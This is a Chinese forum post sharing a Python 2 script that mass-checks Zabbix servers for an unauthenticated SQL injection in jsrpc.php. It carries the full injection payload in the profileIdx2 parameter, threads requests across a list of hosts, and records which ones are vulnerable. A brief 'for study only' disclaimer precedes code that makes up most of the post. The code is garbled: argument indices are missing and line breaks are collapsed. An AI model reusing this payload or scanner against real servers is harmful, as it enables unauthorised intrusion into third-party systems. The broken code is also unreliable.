Python研究:Zabbix SQL怎样注入批量验证脚本
Zabbix昨天又爆新SQL注入,无需登录直接可进行暴错注入,看了一下各大安全社区文章之后今天写一个脚本批量验证一下。
注:本脚本只在于学习与研究,请勿用与非法否则后果自负#coding=utf-8import urllib2import reimport sysimport threadingimport Queue
payload="/zabbix/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"q=Queue.Queue()
class myThread (threading.Thread): def __init__(self,func,args1,args2): threading.Thread.__init__(self) self.func = func self.args1 = args1 self.args2 = args2 def run(self): self.func(self.args1, self.args2)
def zabbix(url): url=urllib2.urlopen(url) urlt=url.read() return urlt
def main(q,f): while True: if not q.empty(): try: urll=q.get().strip() print urll url_=zabbix(urll) urls=r"XPATH syntax error:" user=re.compile(urls) user_s=re.findall(user, url_) if user_s: f.write(urll+""+"\n") print urll+""+"\n" else: pass except: pass
if __name__ == '__main__': helps=u""" zabbixscan扫描 作者:沦沦 使用:zabbixscan -m 线程数 -u url文件.txt 保存文件.txt """ if len(sys.argv)<2: print helps if len(sys.argv)>2: if sys.argv=="-m" and sys.argv=="-u": threads = [] threadList = range(int(sys.argv)) url=open(sys.argv,'r') f=open(sys.argv,'w') for urllt in url: if urllt.strip(): q.put("http://"+urllt.strip()+payload) for i in threadList: t = myThread(main, q, f) t.setDaemon(True) threads.append(t) t.start() for t in threads: t.join() else: print helps原创:沦沦
页:
[1]